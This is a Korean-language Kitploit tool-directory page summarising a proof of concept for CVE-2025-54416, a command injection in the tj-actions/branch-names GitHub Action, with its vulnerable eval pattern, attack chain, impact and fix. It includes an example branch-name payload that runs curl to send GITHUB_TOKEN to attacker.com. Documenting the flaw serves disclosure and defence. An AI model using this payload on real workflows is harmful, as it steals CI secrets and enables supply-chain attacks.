Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
atlas-tj-actions-poc — CVE-2025-54416 tj-actions/branch-names 명령 주입 PoC | Kitploit
도구/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
Vulnerability AnalysisExploitationData ExfiltrationCommand and ControlSupply Chain SecurityLearning & Education
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

CVE-2025-54416 tj-actions/branch-names 명령 주입 PoC

저장소 보기
35개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-54416: tj-actions/branch-names 명령 삽입 PoC

이 저장소는 CVE-2025-54416을 시연합니다. 이는 5,000개 이상의 공개 저장소에 영향을 미치는 tj-actions/branch-names의 치명적인 명령 삽입 취약점입니다.

취약점

tj-actions/branch-names GitHub Action(버전 <= 8.2.1)은 안전하지 않은 eval printf "%s"를 사용하며, 이는 적절한 무해화 이후에도 명령 삽입 위험을 다시 초래합니다.

root@kitploit:~
# Vulnerable code pattern in tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

공격 체인

  1. 공격자는 셸 명령을 포함한 악의적인 이름으로 브랜치를 생성합니다
  2. 피해자의 워크플로는 tj-actions/[email protected]을 사용하여 브랜치 이름을 추출합니다
  3. 추출된 브랜치 이름(공격자 페이로드 포함)은 후속 셸 명령에서 사용됩니다
  4. 명령은 CI 러너 컨텍스트에서 러너의 권한으로 실행됩니다
  5. 비밀값(AWS 키, GITHUB_TOKEN 등)이 유출됩니다

예제 페이로드

브랜치 이름: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

워크플로가 실행되면:

root@kitploit:~
echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# Actual output: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# The $(...) is evaluated by the shell, exfiltrating GITHUB_TOKEN

영향

  • 민감한 비밀값(AWS 키, API 토큰, GITHUB_TOKEN) 탈취
  • 승인되지 않은 코드 수정
  • 프로덕션 레지스트리에 악성 이미지 푸시
  • 손상된 CI/CD를 통한 공급망 공격

수정

tj-actions/branch-names@v9 이상으로 업데이트하세요. 이 버전은 eval printf "%s"를 안전한 printf 호출로 대체합니다.

참조

  • GitHub Advisory GHSA-gq52-6phf-x2r6
  • CVE-2025-54416
도구 다운로드